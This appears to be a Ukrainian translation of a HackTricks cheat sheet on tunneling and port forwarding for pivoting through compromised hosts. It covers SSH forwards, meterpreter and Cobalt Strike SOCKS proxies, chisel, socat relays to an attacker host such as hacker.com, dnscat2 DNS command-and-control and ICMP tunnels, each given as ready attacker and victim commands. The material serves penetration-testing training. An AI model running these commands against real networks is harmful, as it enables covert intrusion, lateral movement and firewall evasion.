Ви працюєте в кібербезпеці компанії? Хочете побачити, як ваша компанія рекламується на HackTricks? або ви хочете мати доступ до останньої версії PEASS або завантажити HackTricks у PDF? Перевірте ПЛАНИ ПІДПИСКИ!
Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFT
ICMP та SYN скани не можуть бути тунельовані через socks проксі, тому ми повинні вимкнути виявлення ping (-Pn) та вказати скани TCP (-sT), щоб це працювало.
Bash
Хост -> Перехід -> ВнутрішнійА -> ВнутрішнійВ
# On the jump server connect the port 3333 to the 5985mknodbackpipep;nc-lvnp59850<backpipe|nc-lvnp33331>backpipe# On InternalA accessible from Jump and can access InternalB## Expose port 3333 and connect it to the winrm port of InternalBexec3<>/dev/tcp/internalB/5985exec4<>/dev/tcp/Jump/3333cat<&3>&4&cat<&4>&3&# From the host, you can now access InternalB from the Jump serverevil-winrm-uusername-iJump
SSH
Графічне підключення SSH (X)
ssh-Y-C<user>@<ip>#-Y is less secure but faster than -X
Локальний порт-до-порту
Відкрийте новий порт на SSH-сервері --> Інший порт
ssh-R0.0.0.0:10521:127.0.0.1:1521user@10.0.0.1#Local port 1521 accessible in port 10521 from everywhere
ssh-R0.0.0.0:10521:10.0.0.1:1521user@10.0.0.1#Remote port 1521 accessible in port 10521 from everywhere
Порт до порту
Локальний порт --> Компрометований хост (SSH) --> Третя_коробка:Порт
ssh -i ssh_key <user>@<ip_compromised> -L <attacker_port>:<ip_victim>:<remote_port> [-p <ssh_port>] [-N -f] #This way the terminal is still in your host
#Examplesudossh-L631:<ip_victim>:631-N-f-l<username><ip_compromised>
Port2hostnet (proxychains)
Локальний порт --> Компрометований хост (SSH) --> Куди завгодно
ssh -f -N -D <attacker_port> <username>@<ip_compromised> #All sent to local port will exit through the compromised server (use as proxy)
Зворотнє перенаправлення портів
Це корисно для отримання зворотніх оболонок від внутрішніх хостів через ДМЗ на ваш хост:
ssh-idmz_key-R<dmz_internal_ip>:443:0.0.0.0:7000root@10.129.203.111-vN# Now you can send a rev to dmz_internal_ip:443 and caputure it in localhost:7000# Note that port 443 must be open# Also, remmeber to edit the /etc/ssh/sshd_config file on Ubuntu systems# and change the line "GatewayPorts no" to "GatewayPorts yes"# to be able to make ssh listen in non internal interfaces in the victim (443 in this case)
VPN-Тунель
Вам потрібен root на обох пристроях (оскільки ви збираєтеся створити нові інтерфейси) і конфігурація sshd повинна дозволяти вхід root:
PermitRootLogin yesPermitTunnel yes
sshroot@server-wany:any#This will create Tun interfaces in both devicesipaddradd1.1.1.2/32peer1.1.1.1devtun0#Client side VPN IPifconfigtun0up#Activate the client side network interfaceipaddradd1.1.1.1/32peer1.1.1.2devtun0#Server side VPN IPifconfigtun0up#Activate the server side network interface
Локальний порт --> Компрометований хост (активна сесія) --> Третя_коробка:Порт
# Inside a meterpreter sessionportfwdadd-l<attacker_port>-p<Remote_port>-r<Remote_host>
SOCKS
SOCKS (Socket Secure) - це протокол, який дозволяє тунелювати з'єднання через файрволи. SOCKS використовується для анонімізації трафіку і отримання доступу до ресурсів, недоступних з локальної мережі.
background#meterpretersessionrouteadd<IP_victim><Netmask><Session># (ex: route add 10.10.10.14 255.255.255.0 8)useauxiliary/server/socks_proxyrun#Proxy port 1080 by defaultecho"socks4 127.0.0.1 1080">/etc/proxychains.conf#Proxychains
Інший спосіб:
background#meterpreter sessionusepost/multi/manage/autoroutesetSESSION<session_n>setSUBNET<New_net_ip>#Ex: set SUBNET 10.1.13.0setNETMASK<Netmask>runuseauxiliary/server/socks_proxysetVERSION4arun#Proxy port 1080 by defaultecho"socks4 127.0.0.1 1080">/etc/proxychains.conf#Proxychains
Cobalt Strike
Проксі-сервер SOCKS
Відкрийте порт в командному сервері, який прослуховує всі інтерфейси, які можуть бути використані для маршрутизації трафіку через бікон.
beacon>socks1080[+] started SOCKS4a server on: 1080# Set port 1080 as proxy server in proxychains.confproxychainsnmap-n-Pn-sT-p445,3389,598510.10.17.25
rPort2Port
У цьому випадку порт відкритий на хості маяка, а не на Сервері Команд і трафік відправляється на Сервер Команд, а звідти на вказаний хост:порт.
У цьому випадку порт відкритий на хості маяка, а не на Сервері Команди, і трафік відправляється на клієнт Cobalt Strike (не на Сервер Команди) і звідти на вказаний хост:порт
Ви можете завантажити його зі сторінки релізів https://github.com/jpillora/chisel
Вам потрібно використовувати той самий версію для клієнта та сервера
socks
./chiselserver-p8080--reverse#Server -- Attacker./chisel-x64.execlient10.10.14.3:8080R:socks#Client -- Victim#And now you can use proxychains with port 1080 (default)./chiselserver-v-p8080--socks5#Server -- Victim (needs to have port 8080 exposed)./chiselclient-v10.10.10.10:8080socks#Attacker
#Create meterpreter backdoor to port 3333 and start msfconsole listener in that portattacker>socatOPENSSL-LISTEN:443,cert=server.pem,cafile=client.crt,reuseaddr,fork,verify=1TCP:127.0.0.1:3333
victim> socat.exe TCP-LISTEN:2222 OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|TCP:hacker.com:443,connect-timeout=5
#Execute the meterpreter
Ви можете обійти неаутентифікований проксі виконавши цей рядок замість останнього в консолі жертви:
Створіть сертифікати на обох сторонах: Клієнт та Сервер
# Execute these commands on both sidesFILENAME=socatsslopensslgenrsa-out $FILENAME.key1024opensslreq-new-key $FILENAME.key-x509-days3653-out $FILENAME.crtcat $FILENAME.key $FILENAME.crt>$FILENAME.pemchmod600 $FILENAME.key $FILENAME.pem
Підключіть локальний порт SSH (22) до порту 443 хоста зловмисника
attacker> sudo socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr #Redirect port 2222 to port 443 in localhost
victim> while true; do socat TCP4:<attacker>:443 TCP4:127.0.0.1:22 ; done # Establish connection with the port 443 of the attacker and everything that comes from here is redirected to port 22
attacker>sshlocalhost-p2222-lwww-data-ivulnerable#Connects to the ssh of the victim
Plink.exe
Це схоже на консольну версію PuTTY (опції дуже схожі на клієнт ssh).
Оскільки цей виконуваний файл буде запущений на жертві і є клієнтом ssh, нам потрібно відкрити наш ssh сервіс та порт, щоб мати зворотне з'єднання. Потім, щоб перенаправити лише локально доступний порт на порт нашої машини:
echo y | plink.exe -l <Our_valid_username> -pw <valid_password> [-p <port>] -R <port_ in_our_host>:<next_ip>:<final_port> <your_ip>
echoy|plink.exe-lroot-pwpassword [-p 2222]-R9090:127.0.0.1:909010.11.0.41#Local port 9090 to out port 9090
Windows netsh
Port2Port
Вам потрібно мати права локального адміністратора (для будь-якого порту)
netshinterfaceportproxyaddv4tov4listenaddress=listenport=connectaddress=connectport=protocol=tcp# Example:netshinterfaceportproxyaddv4tov4listenaddress=0.0.0.0listenport=4444connectaddress=10.10.10.10connectport=4444# Check the port forward was created:netshinterfaceportproxyshowv4tov4# Delete port forwardnetshinterfaceportproxydeletev4tov4listenaddress=0.0.0.0listenport=4444
SocksOverRDP & Proxifier
Вам потрібен доступ RDP до системи.
Завантажте:
SocksOverRDP x64 Binaries - Цей інструмент використовує Dynamic Virtual Channels (DVC) з функції служби віддаленого робочого столу Windows. DVC відповідає за тунелювання пакетів через з'єднання RDP.
На вашому клієнтському комп'ютері завантажте SocksOverRDP-Plugin.dll таким чином:
# Load SocksOverRDP.dll using regsvr32.exeC:\SocksOverRDP-x64>regsvr32.exeSocksOverRDP-Plugin.dll
Тепер ми можемо підключитися до жертви через RDP, використовуючи mstsc.exe, і ми повинні отримати запит, що плагін SocksOverRDP увімкнено, і він буде слухати на 127.0.0.1:1080.
Підключіться через RDP та завантажте та виконайте на машині жертви бінарний файл SocksOverRDP-Server.exe:
C:\SocksOverRDP-x64> SocksOverRDP-Server.exe
Зараз підтвердіть на своїй машині (зловмиснику), що порт 1080 прослуховується:
netstat -antb | findstr 1080
Тепер ви можете використовувати Proxifierдля проксіювання трафіку через цей порт.
Проксіфікація Windows GUI Apps
Ви можете зробити так, щоб Windows GUI apps навігували через проксі, використовуючи Proxifier.
У Profile -> Proxy Servers додайте IP та порт сервера SOCKS.
У Profile -> Proxification Rules додайте назву програми для проксіфікації та підключення до IP-адрес, які ви хочете проксіфікувати.
Обхід проксі-сервера NTLM
Раніше згадане інструмент: RpivotOpenVPN також може його обійти, встановивши ці параметри в файлі конфігурації:
Він аутентифікується проти проксі та прив'язує порт локально, який перенаправляється на зовнішню службу, яку ви вказуєте. Потім ви можете використовувати інструмент за допомогою цього порту.
Наприклад, перенаправлення порту 443
Username Alice
Password P@ssw0rd
Domain CONTOSO.COM
Proxy 10.0.0.10:8080
Tunnel 2222:<attackers_machine>:443
Тепер, якщо ви, наприклад, встановите на жертві службу SSH для прослуховування на порту 443. Ви можете підключитися до неї через порт 2222 атакувальника.
Ви також можете використовувати meterpreter, який підключається до localhost:443, а атакувальник прослуховує порт 2222.
Встановлює канал управління та контролю через DNS. Не потребує привілеїв root.
attacker>ruby./dnscat2.rbtunneldomain.comvictim>./dnscat2tunneldomain.com# If using it in an internal network for a CTF:attacker>rubydnscat2.rb--dnshost=10.10.10.10,port=53,domain=mydomain.local--no-cachevictim>./dnscat2--dnshost=10.10.10.10,port=5353
У PowerShell
Ви можете використовувати dnscat2-powershell, щоб запустити клієнт dnscat2 в powershell:
session-i<sessions_id>listen [lhost:]lport rhost:rport #Ex: listen 127.0.0.1:8080 10.0.0.20:80, this bind 8080port in attacker host
Зміна DNS у proxychains
Proxychains перехоплює виклик бібліотеки libc gethostbyname та тунелює запити tcp DNS через проксі-сервер. За замовчуванням DNS-сервер, який використовує proxychains, - 4.2.2.2 (закодований). Щоб змінити його, відредагуйте файл: /usr/lib/proxychains3/proxyresolv та змініть IP. Якщо ви перебуваєте в середовищі Windows, ви можете встановити IP контролера домену.
Для створення тунельних адаптерів та тунелювання даних між ними за допомогою запитів ICMP echo потрібен root в обох системах.
./hans-v-f-s1.1.1.1-pP@ssw0rd#Start listening (1.1.1.1 is IP of the new vpn connection)./hans-f-c<server_ip>-pP@ssw0rd-vping1.1.1.100#After a successful connection, the victim will be in the 1.1.1.100
# Generate itsudo./autogen.sh# Server -- victim (needs to be able to receive ICMP)sudoptunnel-ng# Client - Attackersudoptunnel-ng-p<server_ip>-l<listen_port>-r<dest_ip>-R<dest_port># Try to connect with SSH through ICMP tunnelssh-p2222-luser127.0.0.1# Create a socks proxy through the SSH connection through the ICMP tunnelssh-D9050-p2222-luser127.0.0.1
ngrok
ngrok - це інструмент для викладання рішень в Інтернеті за однією командою.URI викладання виглядають так:UID.ngrok.io
Працюєте в кібербезпецівій компанії? Хочете побачити рекламу вашої компанії на HackTricks? або хочете мати доступ до останньої версії PEASS або завантажити HackTricks у PDF? Перевірте ПЛАНИ ПІДПИСКИ!
Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFT